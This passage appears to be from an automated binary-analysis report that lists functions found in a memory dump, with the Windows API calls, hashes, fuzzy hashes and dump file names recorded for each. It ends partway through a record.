Function 00FF15F9, Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(00000000,?), ref: 00FF1621
GetWindowRect.USER32 ref: 00FF16A9
PtInRect.USER32(?,?,?), ref: 00FF16BB
MessageBeep.USER32 ref: 00FF1734

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: d18e2232b21e01d16f442e8ea1058c02150a3ac06dd78e21746a87f528faa2ad
Instruction ID: 9cdfa838ff37ca37d668d5b6d37319a2aabce523877cafba8b4ab2a8b6ade575
Opcode Fuzzy Hash: d18e2232b21e01d16f442e8ea1058c02150a3ac06dd78e21746a87f528faa2ad
Instruction Fuzzy Hash: 5841B475B00208DFC714CF55D484EBAB7B9FF99321F1882AAEA55CB3A4C735A841DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0100D19C, Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000000,?,00000000), ref: 0100D235
GetLastError.KERNEL32(?,00000000), ref: 0100D259
DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0100D279
CreateHardLinkW.KERNEL32(00000000,?,00000000), ref: 0100D297

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: d945f1f3f1a139b5922b859b0a3b4f87d00b3498811b6ab6636944436e9a89f1
Instruction ID: 184f2eb11c9647222db4b9c6eb6ede6820cd6f12c60b68012f1363bab5b34e05
Opcode Fuzzy Hash: d945f1f3f1a139b5922b859b0a3b4f87d00b3498811b6ab6636944436e9a89f1
Instruction Fuzzy Hash: 323172B5900201AFEB11EFA6CC88A9AB7ECFF55310F148549F8849B341CB75EC42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01000311, Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0100033E
DefDlgProcW.USER32(?,00000138,?,?), ref: 0100038D
DefDlgProcW.USER32(?,00000133,?,?), ref: 010003DC
DefDlgProcW.USER32(?,00000134,?,?), ref: 0100040D

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Proc$Parent
String ID:
API String ID: 2351499541-0
Opcode ID: eff0c328c2d1e89aa52bebdc784827a5f74875565d191e2f05e235a20a8a3185
Instruction ID: 5067f3f72f9786eddae8f3978727f78175ba9022ba926a973be983688da07aad
Opcode Fuzzy Hash: eff0c328c2d1e89aa52bebdc784827a5f74875565d191e2f05e235a20a8a3185
Instruction Fuzzy Hash: 6F31E831200104AFE7629E1DDC44EAB7B5CEF85375F14C256FB958B2D6CB719442D760

Uniqueness

Uniqueness Score: -1.00%

Function 01024345, Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 01024356

Part of subcall function 00FF38C5: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FF38E8
Part of subcall function 00FF38C5: GetCurrentThreadId.KERNEL32(00000000), ref: 00FF38EF
Part of subcall function 00FF38C5: AttachThreadInput.USER32(00000000), ref: 00FF38F6

GetCaretPos.USER32(?), ref: 0102436C
ClientToScreen.USER32(00000000,?), ref: 010243A2
GetForegroundWindow.USER32 ref: 010243A8

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: c4dc7594195c1c247a485214fe1f0f50de2c4d4543949cdb0b9f418dd1b4821c
Instruction ID: dab8147159079cd7266084f3e7562383acf44328963ddbafcbfe73a487d783e1
Opcode Fuzzy Hash: c4dc7594195c1c247a485214fe1f0f50de2c4d4543949cdb0b9f418dd1b4821c
Instruction Fuzzy Hash: 4E21A971E00309BBD710EFA5CC86FDEB3BCAF44304F144455F645AB282D6BAA9409BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FF93FE, Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE0593: _wcspbrk.LIBCMT ref: 00FE05A3

SendMessageW.USER32(?,00001002,00000000,?), ref: 00FF93D0
SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00FF9460
_wcslen.LIBCMT ref: 00FF9472
_wcslen.LIBCMT ref: 00FF947F

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend_wcslen$_wcspbrk
String ID:
API String ID: 2886238975-0
Opcode ID: bc3d45c4b9f791634186f6bbc59621ae882b27f7ead0e140863a63a2fd8f013a
Instruction ID: c3d8a72f3dc94a6c452be3a734368510a65635d782ac4523b6770ae8cf6f6325
Opcode Fuzzy Hash: bc3d45c4b9f791634186f6bbc59621ae882b27f7ead0e140863a63a2fd8f013a
Instruction Fuzzy Hash: 25212576A0420C96DB30DF96EC81BFEB368EFA4320F10812EFF0486151E7B64995D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0102A224, Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 0101F356: IsWindow.USER32(00000000), ref: 0101F386

GetWindowLongW.USER32(?,000000EC), ref: 0102A299
SetWindowLongW.USER32 ref: 0102A2B4
SetWindowLongW.USER32 ref: 0102A2CC
SetLayeredWindowAttributes.USER32 ref: 0102A2DB

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: a38a7a9efe861c564869761eab5c2aa971594cc6b3f0dd4e72b83fd68de22e6b
Instruction ID: 929b3d8196575a6bedb7e7bbafeb2d0915d30f8f265c334dc3405e15f014a79b
Opcode Fuzzy Hash: a38a7a9efe861c564869761eab5c2aa971594cc6b3f0dd4e72b83fd68de22e6b
Instruction Fuzzy Hash: 2B21A232245524AFD310AB19EC44FDBB7ACEF96330F244216F895D7291CB7AAC45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0101C57B, Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0100875F: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D204E858,00000000,00000000,00000000,00000000,?,?,?,01016CC2,?,01023B72,01023B72,?), ref: 0100877B

gethostbyname.WSOCK32(?,00000000,?,?), ref: 0101C5A6
WSAGetLastError.WSOCK32(00000000), ref: 0101C5B2
_memmove.LIBCMT ref: 0101C5EE
inet_ntoa.WSOCK32(?), ref: 0101C5FA

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
String ID:
API String ID: 2502553879-0
Opcode ID: 6ec243c27a5f731492dd3e91f3e87c40b58ecec728a25374f769d56b74fa7c3c
Instruction ID: 72f68d717279a6140a03497a9e0d56b6fbd078d1fe2a6bc0d783af79c8e88933
Opcode Fuzzy Hash: 6ec243c27a5f731492dd3e91f3e87c40b58ecec728a25374f769d56b74fa7c3c
Instruction Fuzzy Hash: 52216D72A00205ABC710FBA5DC85CDFB3ACFF48310B108555F845A7201DB39EE059BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00FE0165, Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00FE01AF
GetStockObject.GDI32(00000011), ref: 00FE01C5
SendMessageW.USER32(00000000,00000030,00000000), ref: 00FE01CF
ShowWindow.USER32(00000000,00000000), ref: 00FE01EA

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CreateMessageObjectSendShowStock
String ID:
API String ID: 1358664141-0
Opcode ID: a3c2c21f510d5a32fdd55acbd006b15d011c7ff2cfba7403a9cad925edb17984
Instruction ID: 3effcdd2f1668d15d8859d655d4e32ab82187a02833d23ea3a9fcfa84d0ec444
Opcode Fuzzy Hash: a3c2c21f510d5a32fdd55acbd006b15d011c7ff2cfba7403a9cad925edb17984
Instruction Fuzzy Hash: 15117072600544BBD725CE9ADC45FDBB3ADAF8CB10F148209FA0897294D778E881CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00FCF4A4, Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(00000000,00FC6433), ref: 00FCF4A7
__malloc_crt.LIBCMT ref: 00FCF4D6
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FCF4E3

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: a07a87944432e8fab38614fcf9475ee1ed1be3d85d136b98e167caf79eda6857
Instruction ID: 13efa9c65abf547004139b1a45bfc11c0e737ad94e3cf0ea10c34f1bdb5a8fd1
Opcode Fuzzy Hash: a07a87944432e8fab38614fcf9475ee1ed1be3d85d136b98e167caf79eda6857
Instruction Fuzzy Hash: 03F0E9779005125ACB39A734FD47EA7A72ACAD1334316802EF442C3205FA184D49A2A0

Uniqueness

Uniqueness Score: -1.00%

Function 00FFB574, Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00FFB581
InterlockedExchange.KERNEL32(?,?), ref: 00FFB58F
LeaveCriticalSection.KERNEL32(?), ref: 00FFB5A6
LeaveCriticalSection.KERNEL32(?), ref: 00FFB5B8

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$EnterExchangeInterlocked
String ID:
API String ID: 2223660684-0
Opcode ID: 87a4aeee28bb349916bc8b1f62781af41e1c710225eaadd804a1936625ad7e8c
Instruction ID: 9d635dc7d67b2804d63259b4a530529c46f25eba02e9497969168c9e0579dce5
Opcode Fuzzy Hash: 87a4aeee28bb349916bc8b1f62781af41e1c710225eaadd804a1936625ad7e8c
Instruction Fuzzy Hash: ACF05E36641204AF86249A55FC488E7B3ACEB997313044A2BEA8183514876AF845DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00FF7215, Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00FF70BF: DeleteObject.GDI32(00000000), ref: 00FF70FC
Part of subcall function 00FF70BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00FF713C
Part of subcall function 00FF70BF: SelectObject.GDI32(?,00000000), ref: 00FF714C
Part of subcall function 00FF70BF: BeginPath.GDI32(?), ref: 00FF7161
Part of subcall function 00FF70BF: SelectObject.GDI32(?,00000000), ref: 00FF718A

MoveToEx.GDI32(?,?,?,00000000), ref: 00FF723B
LineTo.GDI32(?,?,?), ref: 00FF724A
EndPath.GDI32(?), ref: 00FF725A
StrokePath.GDI32(?), ref: 00FF7268

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
String ID:
API String ID: 2783949968-0
Opcode ID: 90121e6a6ae10c89ab214359880a10044ff53fa2b14a1a9cf0b04d4eeeb0c94e
Instruction ID: ee2c91de25f0bf27424fb9a3baddc5c2c06aac566efaedeca437d731512825cd
Opcode Fuzzy Hash: 90121e6a6ae10c89ab214359880a10044ff53fa2b14a1a9cf0b04d4eeeb0c94e
Instruction Fuzzy Hash: DAF06774109358BBE721AF14AC0AFAB7B5DAF0A320F108101FE41A22C6C7B969418BB5

Uniqueness

Uniqueness Score: -1.00%

Function 00FE6406, Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00FE6425
GetWindowThreadProcessId.USER32(?,00000000), ref: 00FE6438
GetCurrentThreadId.KERNEL32(00000000), ref: 00FE643F
AttachThreadInput.USER32(00000000), ref: 00FE6446

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: d9b3b7d99550c387cdfe0fc65c8e889739df209af09f3d980f79201425ed63bc
Instruction ID: 7faa4361311388f080f7f57384d1ff4d38922fab9dd49773004ad24d2f26c973
Opcode Fuzzy Hash: d9b3b7d99550c387cdfe0fc65c8e889739df209af09f3d980f79201425ed63bc
Instruction Fuzzy Hash: CAF09271680348B6EB31ABA19C0EFDA375CAF24B61F50C001F740E90C5C7FAA5009765

Uniqueness

Uniqueness Score: -1.00%

Function 00FC506D, Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 00FC5070

Part of subcall function 00FC7913: GetLastError.KERNEL32(00000003,?,00FC7994,?,00FC1259,?,?,00FC12DC,?,00000001), ref: 00FC7917
Part of subcall function 00FC7913: ___set_flsgetvalue.LIBCMT ref: 00FC7925
Part of subcall function 00FC7913: __calloc_crt.LIBCMT ref: 00FC7939
Part of subcall function 00FC7913: GetCurrentThreadId.KERNEL32(?,00FC12DC,?,00000001), ref: 00FC7969
Part of subcall function 00FC7913: SetLastError.KERNEL32(00000000,?,00FC12DC,?,00000001), ref: 00FC7981

CloseHandle.KERNEL32(?), ref: 00FC5084
__freeptd.LIBCMT ref: 00FC508B
ExitThread.KERNEL32 ref: 00FC5093

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
String ID:
API String ID: 1454798553-0
Opcode ID: a1ef4e0766c206780f903c4047da3e650d72f8319386a8dedd547e77b7c4779b
Instruction ID: ff9567f82ed0f5db77016248d42d7053548682a5481ee1eff7d6ed34e39353ef
Opcode Fuzzy Hash: a1ef4e0766c206780f903c4047da3e650d72f8319386a8dedd547e77b7c4779b
Instruction Fuzzy Hash: 50D05E31805A1217C2316234590BF0E3259DF40B31B144A08F465CB485CB299D825A90

Uniqueness

Uniqueness Score: -1.00%

Function 00FDF2DF, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 00FDF4BD

Strings

Q\E, xrefs: 00FDF4B7

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _strncmp
String ID: Q\E
API String ID: 909875538-2189900498
Opcode ID: b50a77846252449461fb8cf50a7c8c8f18df79a044b2afbc013cdedac128b635
Instruction ID: 9cf1748784ff6a4c1c33bd53788053734a0b92f825e34515f87e7c97ed09ca1d
Opcode Fuzzy Hash: b50a77846252449461fb8cf50a7c8c8f18df79a044b2afbc013cdedac128b635
Instruction Fuzzy Hash: 84C1D171D042599BDF31CF18D450BAABBB7AF0A320F6C41ABD8D697741D3718D4AAB80

Uniqueness

Uniqueness Score: -1.00%

Function 00FFF36A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FFCF87
_strncmp.LIBCMT ref: 00FFF9B9

Strings

\, xrefs: 00FFCFD7
U, xrefs: 00FFFAFE

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove_strncmp
String ID: U$\
API String ID: 2666721431-100911408
Opcode ID: 0eb57f72225b823ddca2d089180a6afb0b18e5400349479a4c032d7bb747bc97
Instruction ID: 523fdae98550fa8d956aa5d1b6a7f2c17115e8cdbd07710487318dd7409d02ee
Opcode Fuzzy Hash: 0eb57f72225b823ddca2d089180a6afb0b18e5400349479a4c032d7bb747bc97
Instruction Fuzzy Hash: B1719C70E00249CFDF24CFA8C9906BEFBF2AF89314F24826DD556A7295D3349945DB60

Uniqueness

Uniqueness Score: -1.00%

Function 01016362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00FBF260: _wcslen.LIBCMT ref: 00FBF262
Part of subcall function 00FBF260: _wcscpy.LIBCMT ref: 00FBF282

__wcsnicmp.LIBCMT ref: 010163D5
WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0101647B

Strings

LPT, xrefs: 010163CF

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Connection__wcsnicmp_wcscpy_wcslen
String ID: LPT
API String ID: 3035604524-1350329615
Opcode ID: cfe08c360e796a2b99d3e89dc0370d75916d600634da314d1eb9ab9091dfedce
Instruction ID: 72d91f9d5f8073525db8b21433aff23cac8dcaeab1ee175c8053e36106d170e9
Opcode Fuzzy Hash: cfe08c360e796a2b99d3e89dc0370d75916d600634da314d1eb9ab9091dfedce
Instruction Fuzzy Hash: E351B275A00205AFDB10DF98CC81FAEB7B5FB84700F108599F5459B345DBB9EA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FFD34B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FFD0BA

Strings

\, xrefs: 00FFCFD7

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID: \
API String ID: 4104443479-2967466578
Opcode ID: 7d45c08e01fa7e59e557f8fc50fc37862dd91f04bdebfe81c07ca81faf8fbc07
Instruction ID: 20be8c411f5c16e94b05a04bd60b1cc5eefbd58e4bc466647285a894a60a110d
Opcode Fuzzy Hash: 7d45c08e01fa7e59e557f8fc50fc37862dd91f04bdebfe81c07ca81faf8fbc07
Instruction Fuzzy Hash: AE51E170E0025D8FCF24CFA8C9806BDFBB3AF85320F28426AD565A72A5D7315E46DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FF82B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00FF839F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FF83B8

Strings

', xrefs: 00FF8312

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 8555fb6e8268aef61edcba8df19f77b50e00c23730a82c77b9b5dca5884b6ecb
